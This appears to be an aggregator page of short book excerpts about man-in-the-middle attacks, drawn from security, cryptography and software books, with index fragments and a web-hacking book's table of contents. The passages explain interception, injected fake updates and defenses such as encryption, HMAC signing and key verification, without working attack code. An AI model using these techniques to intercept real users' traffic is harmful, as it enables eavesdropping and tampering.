Silicon Valley, Skype, smart contracts, software as a service, software is eating the world, speech recognition, statistical model, Stephen Hawking, supply-chain management, technology bubble, The Chicago School, The Future of Employment, The Great Moderation, the market place, The Nature of the Firm, the payments system, the scientific method, The Wealth of Nations by Adam Smith, Thomas Kuhn: the structure of scientific revolutions, too big to fail, trade liberalization, transaction costs, Turing machine, Turing test, universal basic income, Von Neumann architecture, Washington Consensus

The system uses cryptographic signatures in place of server-side password storage, thus solving a common security problem30 for IT administrators (Cawrey, 2014). BitAuth uses Bitcoin’s technology to create a public-private key pair using secp256k1. By providing the user with a system identification number (SIN) that is a hash of the public key, it allows for password-less authentication across web services. It uses signage to prevent man-in-the-middle (MITM) attacks, and a nonce to prevent replay attacks (Raval, 2016). The private key is never revealed to the server and can be stored safely and securely. Identity is decentralized, so instead of having to trust a third party to store identity, a user can store it themselves. The OpenID protocol, developed by the OpenID Foundation, is also pioneering this concept. OpenID is a decentralized identity protocol that uses existing web protocols like HTTP, SSL, and URI.

See Fragmentation Financial Stability Oversight Committee (FSOC), 94 Financial system, 26 Financial Technology (FinTech), 45 capital markets, 52 Carney, Mark, 45 CHIPS, 48 financial services, 48 financing activities, 46 histroy, 48 insurance sector, 53 investment/wealth management, 50 lending platforms, 49 payments, 49 Foreign direct investment (FDI), 86 Fractional Reserve banking base and broad money, 5–6 capital requirements, 7 central banks, 4, 9 commercial banks, 6, 8 exchanging currency, 7 fractional banking, 9 governments, 5 monetary policies, 5 monetary policy objectives, 10 Tier 1, Tier 2, and Tier 3 capital, 1, 8 value of a currency, 5 Fragmentation concept of, 43 current economic malaise, 44 dial-up Internet access, 44 evolutionary biology, 43 Haldane, Andy, 41 information asymmetry, 42 limitations, 43 problem-solving approaches, 44 regulatory-centric approach, 41 systemic risk, 42 TBTF, 41 US telecoms industry, 39 „„         G Genetic algorithm (GA), 225 Gramm-Leach-Bliley Financial Modernization Act, 31 Greenspan, Alan, 19 Gresham’s law, 133 Guardtime, 68 „„         H Haldane, Andy, 41 Heterogenous interacting agents, 184 High-frequency trading (HFT), 52 Human uncertainty principle, 165 HYPR, 69 „„         I Implicit contracts, 172 Information and communication technologies (ICTs), 85 Institute for New Economical Thinking (INET), 196 Insurance sector, 53 InterLedger Protocol (ILP), 82, 97, 107 Internal Revenue Service (IRS), 121 iSignthis, 71 „„         J Junk bonds, 11 „„         K Kashkari, Neel, 37–38 Kelton, Stephanie, 139 Kim-Markowitz Portfolio Insurers Model, 204 Know Your Business (KYB), 97 Know Your Customer (KYC), 67 advantage, 75 Atlantic model, 75 245 ■ INDEX Know Your Customer (KYC) (cont.) concept of, 74 contextual scenario, 74 development of, 73 documents, 72 empirical approach, 74 Government digital identity programs, 78, 80–81 identity, 67 identity and KYC/AML services, 68–71 Kabbage, 73 KYC-Chain, 71 manifestations, 73 merchant processor, 76 multidimensional attributes, 77 multiple sources, 73 Namecoin blockchain, 77 OpenID protocol, 76 procedural system, 72 regulatory institutions, 72 tokenized identity, 74 transactional systems, 75 value exchange platforms, 73 vast-ranging subject, 78 Zooko’s triangle, 77 kompany.com, 70 „„         L Large hadron collider (LHC), 166 Living Will Review process, 34 „„         M Macroeconomic models types cellular automata (CA), 221 equilibrium business-cycle models, 221 genetic algorithm (GA), 225 neural networks, 222 rational expectations structural models, 221 traditional structural models, 221 vector autoregression (VAR) models, 221 Macroeconomic theories, 22 Man-in-the-middle (MITM), 76 Marketing money, 119 cashless system, 120 crime and taxation, 123 economy, 122 246 IRS, 121 money, 119 Seigniorage, 122 tax evasion, 121 Mathematical game theory, 183 McFadden Act, 31 Mincome, Canada, 147 Minority Game (MG), 210 Money anddebt. See also Debt and money capitalism, 22 cash obsession, 2 CRS report, 2 currencies, 3 floating exchange, 3 functions, 3 gold and silver, 3 history of money, 3 histroy, 2 real commodities, 3 transfer of, 4 types of, 3 withdrawn, 4 shadowbanking (see (Shadow banking and systemic risk)) utilitarian approach, 1 Multiple currencies, 130 Bitcoin Obituaries, 134 bitcoin price, 132 BTC/USD and USD/EUR volatility, 131 contractual money, 132 cryptocurrencies, 133 differences, 131 free banking, 135 Gresham’s law, 133 legal definition, 132 legal status, 132 private and government fiat, 134 private money, 130 quantitative model, 133 sovereign cash, 134 volatility, 131 „„         N Namecoin blockchain, 77 Namibia, 147 Natural Language Processing (NLP), 140 NemID, 79 Neo-Keynesian models, 169 Neuroplasticity, 220–221 New Keynesian models (NK models), 169 ■ INDEX „„         O Occupational Information Network (ONET), 89 Office of Scientific Research and Development (OSRD), 218 OpenID protocol, 76 Originate, repackage and sell model, 29 Originate-to-distribute model, 29 „„         P Paine, Thomas, 144 Palley, Thomas I., 28 Payment protection insurance (PPI), 32 Peer-to-peer (P2P), 46 Personal identification number (PIN), 79 Polycoin, 70 Popperian falsifiability, 163 Public Company Accounting Oversight Board (PCAOB), 153 Public-key certificate (PKC), 76 Public-key infrastructure (PKI), 76 „„         Q Quantitative easing (QE), 138 Quantitative model, 133 „„         R R3 CORDA™, 103 Rational expectations, 161–163 Rational expectations structural models, 221 Rational expectations theory (RET), 156 Rational expectations theory (RMT), 21 RBCmodels.


pages: 305 words: 93,091

The Art of Invisibility: The World's Most Famous Hacker Teaches You How to Be Safe in the Age of Big Brother and Big Data by Kevin Mitnick, Mikko Hypponen, Robert Vamosi

4chan, big-box store, bitcoin, blockchain, connected car, crowdsourcing, Edward Snowden, en.wikipedia.org, Firefox, Google Chrome, Google Earth, Internet of things, Kickstarter, license plate recognition, Mark Zuckerberg, MITM: man-in-the-middle, pattern recognition, ransomware, Ross Ulbricht, self-driving car, Silicon Valley, Skype, Snapchat, speech recognition, Tesla Model S, web application, WikiLeaks, zero day, Zimmermann PGP

Girls send, on average, about 3,952 text messages per month, and boys send closer to 2,815 text messages per month, according to the study.12 The good news is that today all the popular messaging apps provide some form of encryption when sending and receiving your texts—that is, they protect what’s called “data in motion.” The bad news is that not all the encryption being used is strong. In 2014, researcher Paul Jauregui of the security firm Praetorian found that it was possible to circumvent the encryption used by WhatsApp and engage in a man-in-the-middle (MitM) attack, in which the attacker intercepts messages between the victim and his recipient and is able to see every message. “This is the kind of stuff the NSA would love,” Jauregui observed.13 As of this writing, the encryption used in WhatsApp has been updated and uses end-to-end encryption on both iOS and Android devices. And the parent company for WhatsApp, Facebook, has added encryption to its 900 million Messenger users, although it is an opt-in, meaning you have to configure “Secret Conversations” to work.14 The worse news is what happens to data that’s archived, or “data at rest.”

Because I’m sitting in the middle of the interaction between the victim and the website, I can inject JavaScript and cause fake Adobe updates to pop up on his or her screen, which, if installed will infect the victim’s computer with malware. The purpose is usually to trick you into installing the fake update to gain control of your computer. When the guy at the corner table is influencing the Internet traffic, that’s called a man-in-the-middle attack. The attacker is proxying your packets through to the real site, but intercepting or injecting data along the way. Knowing that you could unintentionally connect to a shady Wi-Fi access point, how can you prevent it? On a laptop the device will go through the process of searching for a preferred wireless network and then connect to it. But some laptops and mobile devices automatically choose what network to join.

If I can get on your home network, I can eavesdrop on whatever conversation you’re having in your home while the TV is turned on. The argument in favor of keeping the TV in listening mode is that the device needs to hear any additional commands you might give it, such as “Volume up,” “Change the channel,” and “Mute the sound.” That might be okay, except the captured voice commands go up to a satellite before they come back down again. And because the entire string of data is not encrypted, I can carry out a man-in-the-middle attack on your TV, inserting my own commands to change your channel, pump up your volume, or simply turn off the TV whenever I want. Let’s think about that for a second. That means if you’re in a room with a voice-activated TV, in the middle of a conversation with someone, and you decide to turn on the TV, the stream of conversation that follows may be recorded by your digital TV. Moreover, that recorded conversation about the upcoming bake sale at the elementary school may be streamed back to a server somewhere far from your living room.


Multitool Linux: Practical Uses for Open Source Software by Michael Schwarz, Jeremy Anderson, Peter Curtis

business process, Debian, defense in depth, GnuPG, index card, indoor plumbing, Larry Wall, MITM: man-in-the-middle, optical character recognition, publish or perish, RFC: Request For Comment, Richard Stallman, SETI@home, slashdot, web application

RSA key fingerprint is 58:f1:d0:f7:db:86:81:76:60:e2:7c:dd:d9:ff:f1:4e. Are you sure you want to continue connecting (yes/no)? Danger, Will Robinson! Danger! Harken back, if you will, to Chapter 10. Once again, you are dealing with cryptographic keys and trust. Only you can decide whether to trust the host key. Once you have done so, it is trusted for all time. Key discovery by connection is very risky. It is easily foiled by a "Man in the Middle" attack (MITM). You could be connecting to a spoofed host, where they are feeding you a key of their own creation. They will then make a connection of their own to the real host. Just as with GPG, I prefer to ship host keys in person. In this case, however, let's throw caution to the wind and proceed: Are you sure you want to continue connecting (yes/no)? yes Warning: Permanently added 'alienmystery.planetmercury.net,216.17.15.13' (RSA) to the list of known hosts.


Applied Cryptography: Protocols, Algorithms, and Source Code in C by Bruce Schneier

active measures, cellular automata, Claude Shannon: information theory, complexity theory, dark matter, Donald Davies, Donald Knuth, dumpster diving, Exxon Valdez, fault tolerance, finite state, invisible hand, John von Neumann, knapsack problem, MITM: man-in-the-middle, NP-complete, P = NP, packet switching, RAND corporation, RFC: Request For Comment, software patent, telemarketer, traveling salesman, Turing machine, web of trust, Zimmermann PGP

Or better yet, he can break into the database surreptitiously and substitute his key for both Alice’s and Bob’s. Then he simply waits for Alice and Bob to talk with each other, intercepts and modifies the messages, and he has succeeded. This man-in-the-middle attack works because Alice and Bob have no way to verify that they are talking to each other. Assuming Mallory doesn’t cause any noticeable network delays, the two of them have no idea that someone sitting between them is reading all of their supposedly secret communications. Interlock Protocol The interlock protocol, invented by Ron Rivest and Adi Shamir [1327], has a good chance of foiling the man-in-the-middle attack. Here’s how it works: (1) Alice sends Bob her public key. (2) Bob sends Alice his public key. (3) Alice encrypts her message using Bob’s public key. She sends half of the encrypted message to Bob. (4) Bob encrypts his message using Alice’s public key.

SKID3 provides mutual authentication between Alice and Bob. Steps (1) through (3) are identical to SKID2, and then the protocol proceeds with: (4) Alice sends Bob: HK(RB,A) A is Alice’s name. (5) Bob computes HK(RB,A), and compares it with what he received from Alice. If the results are identical, then Bob knows that he is communicating with Alice. This protocol is not secure against a man-in-the-middle attack. In general, a man-in-the-middle attack can defeat any protocol that doesn’t involve a secret of some kind. Message Authentication When Bob receives a message from Alice, how does he know it is authentic? If Alice signed her message, this is easy. Alice’s digital signature is enough to convince anyone that the message is authentic. Symmetric cryptography provides some authentication. When Bob receives a message from Alice encrypted in their shared key, he knows it is from Alice.

EKE is patented [111]. 22.6 Fortified Key Negotiation This scheme also protects key-negotiation schemes from poorly chosen passwords and man-in-the-middle attacks [47,983]. It uses a hash function of two variables that has a very special property: It has many collisions on the first variable while having effectively no collisions on the second variable. H´(x, y) = H(H(k, x) mod 2m, x), where H(k, x) is an ordinary hash function on k and x Here’s the protocol. Alice and Bob share a secret password, P, and have just exchanged a secret key, K, using Diffie-Hellman key exchange. They use P to check that their two session keys are the same (and that Eve is not attempting a man-in-the-middle attack), without giving P away to Eve. (1) Alice sends Bob H´ (P, K) (2) Bob computes H´ (P, K) and compares his result with what he received from Alice.


pages: 540 words: 103,101

Building Microservices by Sam Newman

airport security, Amazon Web Services, anti-pattern, business process, call centre, continuous integration, create, read, update, delete, defense in depth, don't repeat yourself, Edward Snowden, fault tolerance, index card, information retrieval, Infrastructure as a Service, inventory management, job automation, Kubernetes, load shedding, loose coupling, microservices, MITM: man-in-the-middle, platform as a service, premature optimization, pull request, recommendation engine, social graph, software as a service, source of truth, the built environment, web application, WebSocket

Allow Everything Inside the Perimeter Our first option could be to just assume that any calls to a service made from inside our perimeter are implicitly trusted. Depending on the sensitivity of the data, this might be fine. Some organizations attempt to ensure security at the perimeter of their networks, and therefore assume they don’t need to do anything else when two services are talking together. However, should an attacker penetrate your network, you will have little protection against a typical man-in-the-middle attack. If the attacker decides to intercept and read the data being sent, change the data without you knowing, or even in some circumstances pretend to be the thing you are talking to, you may not know much about it. This is by far the most common form of inside-perimeter trust I see in organizations. They may decide to run this traffic over HTTPS, but they don’t do much else. I’m not saying that is a good thing!

If you’re using a gateway, you’ll need to route all in-network traffic via the gateway too, but if each service is handling the integration itself, this approach should just work out of the box. The advantage here is that you’re making use of existing infrastructure, and get to centralize all your service access controls in a central directory server. We’d still need to route this over HTTPS if we wanted to avoid man-in-the-middle attacks. Clients have a set of credentials they use to authenticate themselves with the identity provider, and the service gets the information it needs to decide on any fine-grained authentication. This does mean you’ll need an account for your clients, sometimes referred to as a service account. Many organizations use this approach quite commonly. A word of warning, though: if you are going to create service accounts, try to keep their use narrow.

An alternative approach, as used extensively by Amazon’s S3 APIs for AWS and in parts of the OAuth specification, is to use a hash-based messaging code (HMAC) to sign the request. With HMAC the body request along with a private key is hashed, and the resulting hash is sent along with the request. The server then uses its own copy of the private key and the request body to re-create the hash. If it matches, it allows the request. The nice thing here is that if a man in the middle messes with the request, then the hash won’t match and the server knows the request has been tampered with. And the private key is never sent in the request, so it cannot be compromised in transit! The added benefit is that this traffic can then more easily be cached, and the overhead of generating the hashes may well be lower than handling HTTPS traffic (although your mileage may vary). There are three downsides to this approach.


pages: 398 words: 120,801

Little Brother by Cory Doctorow

airport security, Bayesian statistics, Berlin Wall, citizen journalism, Firefox, game design, Golden Gate Park, Haight Ashbury, Internet Archive, Isaac Newton, Jane Jacobs, Jeff Bezos, mail merge, Mitch Kapor, MITM: man-in-the-middle, RFID, Sand Hill Road, Silicon Valley, slashdot, Steve Jobs, Steve Wozniak, Thomas Bayes, web of trust, zero day

Let him follow you around and take all the notes he wants, but steam open the envelopes that he sends back to HQ and replace his account of your movements with a fictitious one. If you want, you can make him seem erratic and unreliable so they get rid of him. You can manufacture crises that might make one side or the other reveal the identities of other spies. In short, you own them. This is called the man-in-the-middle attack and if you think about it, it's pretty scary. Someone who man-in-the-middles your communications can trick you in any of a thousand ways. Of course, there's a great way to get around the man-in-the-middle attack: use crypto. With crypto, it doesn't matter if the enemy can see your messages, because he can't decipher them, change them, and re-send them. That's one of the main reasons to use crypto. But remember: for crypto to work, you need to have keys for the people you want to talk to.

Now, the easiest way to fix this is to really widely advertise your public key. If it's really easy for anyone to know what your real key is, man-in-the-middle gets harder and harder. But you know what? Making things well-known is just as hard as keeping them secret. Think about it -- how many billions of dollars are spent on shampoo ads and other crap, just to make sure that as many people know about something that some advertiser wants them to know? There's a cheaper way of fixing man-in-the-middle: the web of trust. Say that before you leave HQ, you and your bosses sit down over coffee and actually tell each other your keys. No more man-in-the-middle! You're absolutely certain whose keys you have, because they were put into your own hands. So far, so good. But there's a natural limit to this: how many people can you physically meet with and swap keys?


pages: 1,302 words: 289,469

The Web Application Hacker's Handbook: Finding and Exploiting Security Flaws by Dafydd Stuttard, Marcus Pinto

call centre, cloud computing, commoditize, database schema, defense in depth, easy for humans, difficult for computers, Firefox, information retrieval, lateral thinking, MITM: man-in-the-middle, MVC pattern, optical character recognition, Ruby on Rails, Turing test, web application

It provides a wide range of functions for manipulating zombie hosts compromised via XSS, including capturing keystrokes, clipboard contents, mouse movements, screenshots, and URL history, as well as the injection of arbitrary JavaScript commands. It also remains resident within the user's browser if she navigates to other pages within the application. Man-in-the-Middle Attacks Earlier chapters described how a suitably positioned attacker can intercept sensitive data, such as passwords and session tokens, if an application uses unencrypted F1TTP communications. What is more surprising is that some serious attacks can still be performed even if an application uses HTTPS for all sensitive data and the target user always verifies that HTTPS is being used properly. These attacks involve an "active" man in the middle. Instead of just passively monitoring another user's traffic, this type of attacker also changes some of that traffic on the fly. Such an attack is more sophisticated, but it can certainly be delivered in numerous common situations, including public wireless hotspots and shared office networks, and by suitably minded governments.

Such an attack is more sophisticated, but it can certainly be delivered in numerous common situations, including public wireless hotspots and shared office networks, and by suitably minded governments. Many applications use HTTP for nonsensitive content, such as product descriptions and help pages. If such content makes any script includes using absolute URLs, an active man-in-the-middle attack can be used to compromise HTTPS-protected requests on the same domain. For example, an application's help page may contain the following: <script src="http://wahh-app.com/help.j s"></script> Chapter 15 ■ Attacking Users: Other Techniques 567 This behavior of using absolute URLs to include scripts over HTTP appears in numerous high-profile applications on the web today. In this situation, an active man-in-the-middle attacker could, of course, modify any HTTP response to execute arbitrary script code. However, because the same-origin policy generally treats content loaded over HTTP and HTTPS as belonging to different origins, this would not enable the attacker to compromise content that is accessed using HTTPS.

vii Contents at a Glance viii Contents Introduction xxiii Chapter 1 Web Application (In)security 1 The Evolution of Web Applications 2 Common Web Application Functions 4 Benefits of Web Applications 5 Web Application Security 6 "This Site Is Secure" 7 The Core Security Problem: Users Can Submit Arbitrary Input 9 Key Problem Factors 10 The New Security Perimeter 12 The Future of Web Application Security 14 Summary 15 Chapter 2 Core Defense Mechanisms 17 Handling User Access 18 Authentication 18 Session Management 19 Access Control 20 Handling User Input 21 Varieties of Input 21 Approaches to Input Handling 23 Boundary Validation 25 Multistep Validation and Canonicalization 28 Handling Attackers 30 Handling Errors 30 Maintaining Audit Logs 31 Alerting Administrators 33 Reacting to Attacks 34 X Contents Chapter 3 Chapter 4 Contents xi Chapter 5 Bypassing Client-Side Controls 117 Transmitting Data Via the Client 118 Hidden Form Fields 118 HTTP Cookies 121 URL Parameters 121 The Referer Header 122 Opaque Data 123 The ASP.NET ViewState 124 Capturing User Data: HTML Forms 127 Length Limits 128 Script-Based Validation 129 Disabled Elements 131 Capturing User Data: Browser Extensions 133 Common Browser Extension Technologies 134 Approaches to Browser Extensions 135 Intercepting Traffic from Browser Extensions 135 Decompiling Browser Extensions 139 Attaching a Debugger 151 Native Client Components 153 Handling Client-Side Data Securely 154 Transmitting Data Via the Client 154 Validating Client-Generated Data 155 Logging and Alerting 156 Summary 156 Questions 157 Chapter 6 Attacking Authentication 159 Authentication Technologies 160 Design Flaws in Authentication Mechanisms 161 Bad Passwords 161 Brute-Forcible Login 162 Verbose Failure Messages 166 Vulnerable Transmission of Credentials 169 Password Change Functionality 171 Forgotten Password Functionality 173 "Remember Me" Functionality 176 User Impersonation Functionality 178 Incomplete Validation of Credentials 180 Nonunique Usernames 181 Predictable Usernames 182 Predictable Initial Passwords 183 Insecure Distribution of Credentials 184 Implementation Flaws in Authentication 185 Fail-Open Login Mechanisms 185 Defects in Multistage Login Mechanisms 186 Insecure Storage of Credentials 190 xii Contents Securing Authentication 191 Use Strong Credentials 192 Handle Credentials Secretively 192 Validate Credentials Properly 193 Prevent Information Leakage 195 Prevent Brute-Force Attacks 196 Prevent Misuse of the Password Change Function 199 Prevent Misuse of the Account Recovery Function 199 Log, Monitor, and Notify 201 Summary 201 Questions 202 Chapter 7 Attacking Session Management 205 The Need for State 206 Alternatives to Sessions 208 Weaknesses in Token Generation 210 Meaningful Tokens 210 Predictable Tokens 213 Encrypted Tokens 223 Weaknesses in Session Token Handling 233 Disclosure of Tokens on the Network 234 Disclosure of Tokens in Logs 237 Vulnerable Mapping of Tokens to Sessions 240 Vulnerable Session Termination 241 Client Exposure to Token Hijacking 243 Liberal Cookie Scope 244 Securing Session Management 248 Generate Strong Tokens 248 Protect Tokens Throughout Their Life Cycle 250 Log, Monitor, and Alert 253 Summary 254 Questions 255 Chapter 8 Attacking Access Controls 257 Common Vulnerabilities 258 Completely Unprotected Functionality 259 Identifier-Based Functions 261 Multistage Functions 262 Static Files 263 Platform Misconfiguration 264 Insecure Access Control Methods 265 Attacking Access Controls 266 Testing with Different User Accounts 267 Testing Multistage Processes 271 Testing with Limited Access 273 Testing Direct Access to Methods 276 Testing Controls Over Static Resources 277 Contents xiii Testing Restrictions on HTTP Methods 278 Securing Access Controls 278 A Multilayered Privilege Model 280 Summary 284 Questions 284 Chapter 9 Attacking Data Stores 287 Injecting into Interpreted Contexts 288 Bypassing a Login 288 Injecting into SQL 291 Exploiting a Basic Vulnerability 292 Injecting into Different Statement Types 294 Finding SQL Injection Bugs 298 Fingerprinting the Database 303 The UNION Operator 304 Extracting Useful Data 308 Extracting Data with UNION 308 Bypassing Filters 311 Second-Order SQL Injection 313 Advanced Exploitation 314 Beyond SQL Injection: Escalating the Database Attack 325 Using SQL Exploitation Tools 328 SQL Syntax and Error Reference 332 Preventing SQL Injection 338 Injecting into NoSQL 342 Injecting into MongoDB 343 Injecting into XPath 344 Subverting Application Logic 345 Informed XPath Injection 346 Blind XPath Injection 347 Finding XPath Injection Flaws 348 Preventing XPath Injection 349 Injecting into LDAP 349 Exploiting LDAP Injection 351 Finding LDAP Injection Flaws 353 Preventing LDAP Injection 354 Summary 354 Questions 354 Chapter 10 Attacking Back-End Components 357 Injecting OS Commands 358 Example 1: Injecting Via Perl 358 Example 2: Injecting Via ASP 360 Injecting Through Dynamic Execution 362 Finding OS Command Injection Flaws 363 Finding Dynamic Execution Vulnerabilities 366 xiv Contents Preventing OS Command Injection 367 Preventing Script Injection Vulnerabilities 368 Manipulating File Paths 368 Path Traversal Vulnerabilities 368 File Inclusion Vulnerabilities 381 Injecting into XML Interpreters 383 Injecting XML External Entities 384 Injecting into SOAP Services 386 Finding and Exploiting SOAP Injection 389 Preventing SOAP Injection 390 Injecting into Back-end HTTP Requests 390 Server-side HTTP Redirection 390 HTTP Parameter Injection 393 Injecting into Mail Services 397 E-mail Header Manipulation 398 SMTP Command Injection 399 Finding SMTP Injection Flaws 400 Preventing SMTP Injection 402 Summary 402 Questions 403 Chapter 11 Attacking Application Logic 405 The Nature of Logic Flaws 406 Real-World Logic Flaws 406 Example 1: Asking the Oracle 407 Example 2: Fooling a Password Change Function 409 Example 3: Proceeding to Checkout 410 Example 4: Rolling Your Own Insurance 412 Example 5: Breaking the Bank 414 Example 6: Beating a Business Limit 416 Example 7: Cheating on Bulk Discounts 418 Example 8: Escaping from Escaping 419 Example 9: Invalidating Input Validation 420 Example 10: Abusing a Search Function 422 Example 11: Snarfing Debug Messages 424 Example 12: Racing Against the Login 426 Avoiding Logic Flaws 428 Summary 429 Questions 430 Chapter 12 Attacking Users: Cross-Site Scripting 431 Varieties of XSS 433 Reflected XSS Vulnerabilities 434 Stored XSS Vulnerabilities 438 DOM-Based XSS Vulnerabilities 440 XSS Attacks in Action 442 Real-World XSS Attacks 442 Contents xv Payloads for XSS Attacks 443 Delivery Mechanisms for XSS Attacks 447 Finding and Exploiting XSS Vulnerabilities 451 Finding and Exploiting Reflected XSS Vulnerabilities 452 Finding and Exploiting Stored XSS Vulnerabilities 481 Finding and Exploiting DOM-Based XSS Vulnerabilities 487 Preventing XSS Attacks 492 Preventing Reflected and Stored XSS 492 Preventing DOM-Based XSS 496 Summary 498 Questions 498 Chapter 13 Attacking Users: Other Techniques 501 Inducing User Actions 501 Request Forgery 502 UI Redress 511 Capturing Data Cross-Domain 515 Capturing Data by Injecting HTML 516 Capturing Data by Injecting CSS 517 JavaScript Hijacking 519 The Same-Origin Policy Revisited 524 The Same-Origin Policy and Browser Extensions 525 The Same-Origin Policy and HTML5 528 Crossing Domains with Proxy Service Applications 529 Other Client-Side Injection Attacks 531 HTTP Header Injection 531 Cookie Injection 536 Open Redirection Vulnerabilities 540 Client-Side SQL Injection 547 Client-Side HTTP Parameter Pollution 548 Local Privacy Attacks 550 Persistent Cookies 550 Cached Web Content 551 Browsing History 552 Autocomplete 552 Flash Local Shared Objects 553 Silverlight Isolated Storage 553 Internet Explorer userData 554 HTML5 Local Storage Mechanisms 554 Preventing Local Privacy Attacks 554 Attacking ActiveX Controls 555 Finding ActiveX Vulnerabilities 556 Preventing ActiveX Vulnerabilities 558 Attacking the Browser 559 Logging Keystrokes 560 Stealing Browser History and Search Queries 560 xvi Contents Enumerating Currently Used Applications 560 Port Scanning 561 Attacking Other Network Hosts 561 Exploiting Non-HTTP Services 562 Exploiting Browser Bugs 563 DNS Rebinding 563 Browser Exploitation Frameworks 564 Man-in-the-Middle Attacks 566 Summary 568 Questions 568 Chapter 14 Automating Customized Attacks 571 Uses for Customized Automation 572 Enumerating Valid Identifiers 573 The Basic Approach 574 Detecting Hits 574 Scripting the Attack 576 JAttack 577 Harvesting Useful Data 583 Fuzzing for Common Vulnerabilities 586 Putting It All Together: Burp Intruder 590 Barriers to Automation 602 Session-Handling Mechanisms 602 CAPTCHA Controls 610 Summary 613 Questions 613 Chapter 15 Exploiting Information Disclosure 615 Exploiting Error Messages 615 Script Error Messages 616 Stack Traces 617 Informative Debug Messages 618 Server and Database Messages 619 Using Public Information 623 Engineering Informative Error Messages 624 Gathering Published Information 625 Using Inference 626 Preventing Information Leakage 627 Use Generic Error Messages 628 Protect Sensitive Information 628 Minimize Client-Side Information Leakage 629 Summary 629 Questions 630 Chapter 16 Attacking Native Compiled Applications 633 Buffer Overflow Vulnerabilities 634 Stack Overflows 634 Heap Overflows 635 Contents xvii "Off-by-One" Vulnerabilities 636 Detecting Buffer Overflow Vulnerabilities 639 Integer Vulnerabilities 640 Integer Overflows 640 Signedness Errors 641 Detecting Integer Vulnerabilities 642 Format String Vulnerabilities 643 Detecting Format String Vulnerabilities 644 Summary 645 Questions 645 Chapter 17 Attacking Application Architecture 647 Tiered Architectures 647 Attacking Tiered Architectures 648 Securing Tiered Architectures 654 Shared Flosting and Application Service Providers 656 Virtual Hosting 657 Shared Application Services 657 Attacking Shared Environments 658 Securing Shared Environments 665 Summary 667 Questions 667 Chapter 18 Attacking the Application Server 669 Vulnerable Server Configuration 670 Default Credentials 670 Default Content 671 Directory Listings 677 WebDAV Methods 679 The Application Server as a Proxy 682 Misconfigured Virtual Hosting 683 Securing Web Server Configuration 684 Vulnerable Server Software 684 Application Framework Flaws 685 Memory Management Vulnerabilities 687 Encoding and Canonicalization 689 Finding Web Server Flaws 694 Securing Web Server Software 695 Web Application Firewalls 697 Summary 699 Questions 699 Chapter 19 Finding Vulnerabilities in Source Code 701 Approaches to Code Review 702 Black-Box Versus White-Box Testing 702 Code Review Methodology 703 Signatures of Common Vulnerabilities 704 Cross-Site Scripting 704 xviii Contents Chapter 20 Contents xix Technical Challenges Faced by Scanners 778 Current Products 781 Using a Vulnerability Scanner 783 Other Tools 785 Wikto/Nikto 785 Firebug 785 Hydra 785 Custom Scripts 786 Summary 789 Chapter 21 A Web Application Hacker's Methodology 791 General Guidelines 793 1 Map the Application's Content 795 1.1 Explore Visible Content 795 1.2 Consult Public Resources 796 1.3 Discover Hidden Content 796 1.4 Discover Default Content 797 1.5 Enumerate Identifier-Specified Functions 797 1.6 Test for Debug Parameters 798 2 Analyze the Application 798 2.1 Identify Functionality 798 2.2 Identify Data Entry Points 799 2.3 Identify the Technologies Used 799 2.4 Map the Attack Surface 800 3 Test Client-Side Controls 800 3.1 Test Transmission of Data Via the Client 801 3.2 Test Client-Side Controls Over User Input 801 3.3 Test Browser Extension Components 802 4 Test the Authentication Mechanism 805 4.1 Understand the Mechanism 805 4.2 Test Password Quality 806 4.3 Test for Username Enumeration 806 4.4 Test Resilience to Password Guessing 807 4.5 Test Any Account Recovery Function 807 4.6 Test Any Remember Me Function 808 4.7 Test Any Impersonation Function 808 4.8 Test Username Uniqueness 809 4.9 Test Predictability of Autogenerated Credentials 809 4.10 Check for Unsafe Transmission of Credentials 810 4.11 Check for Unsafe Distribution of Credentials 810 4.12 Test for Insecure Storage 811 4.13 Test for Logic Flaws 811 4.14 Exploit Any Vulnerabilities to Gain Unauthorized Access 813 5 Test the Session Management Mechanism 814 5.1 Understand the Mechanism 814 5.2 Test Tokens for Meaning 815 5.3 Test Tokens for Predictability 816 xx Contents 5.4 Check for Insecure Transmission of Tokens 817 5.5 Check for Disclosure of Tokens in Logs 817 5.6 Check Mapping of Tokens to Sessions 818 5.7 Test Session Termination 818 5.8 Check for Session Fixation 819 5.9 Check for CSRF 820 5.10 Check Cookie Scope 820 6 Test Access Controls 821 6.1 Understand the Access Control Requirements 821 6.2 Test with Multiple Accounts 822 6.3 Test with Limited Access 822 6.4 Test for Insecure Access Control Methods 823 7 Test for Input-Based Vulnerabilities 824 7.1 Fuzz All Request Parameters 824 7.2 Test for SQL Injection 827 7.3 Test for XSS and Other Response Injection 829 7.4 Test for OS Command Injection 832 7.5 Test for Path Traversal 833 7.6 Test for Script Injection 835 7.7 Test for File Inclusion 835 8 Test for Function-Specific Input Vulnerabilities 836 8.1 Test for SMTP Injection 836 8.2 Test for Native Software Vulnerabilities 837 8.3 Test for SOAP Injection 839 8.4 Test for LDAP Injection 839 8.5 Test for XPath Injection 840 8.6 Test for Back-End Request Injection 841 8.7 Test for XXE Injection 841 9 Test for Logic Flaws 842 9.1 Identify the Key Attack Surface 842 9.2 Test Multistage Processes 842 9.3 Test Handling of Incomplete Input 843 9.4 Test Trust Boundaries 844 9.5 Test Transaction Logic 844 10 Test for Shared Hosting Vulnerabilities 845 10.1 Test Segregation in Shared Infrastructures 845 10.2 Test Segregation Between ASP-Hosted Applications 845 11 Test for Application Server Vulnerabilities 846 11.1 Test for Default Credentials 846 11.2 Test for Default Content 847 11.3 Test for Dangerous HTTP Methods 847 11.4 Test for Proxy Functionality 847 11.5 Test for Virtual Hosting Misconfiguration 847 11.6 Test for Web Server Software Bugs 848 11.7 Test for Web Application Firewalling 848 Contents xxi 12 Miscellaneous Checks 849 12.1 Check for DOM-Based Attacks 849 12.2 Check for Local Privacy Vulnerabilities 850 12.3 Check for Weak SSL Ciphers 851 12.4 Check Same-Origin Policy Configuration 851 13 Follow Up Any Information Leakage 852 Index 853 Introduction This book is a practical guide to discovering and exploiting security flaws in web applications.


pages: 273 words: 72,024

Bitcoin for the Befuddled by Conrad Barski

Airbnb, AltaVista, altcoin, bitcoin, blockchain, buttonwood tree, cryptocurrency, Debian, en.wikipedia.org, Ethereum, ethereum blockchain, fiat currency, Isaac Newton, MITM: man-in-the-middle, money: store of value / unit of account / medium of exchange, Network effects, node package manager, p-value, peer-to-peer, price discovery process, QR code, Satoshi Nakamoto, self-driving car, SETI@home, software as a service, the payments system, Yogi Berra

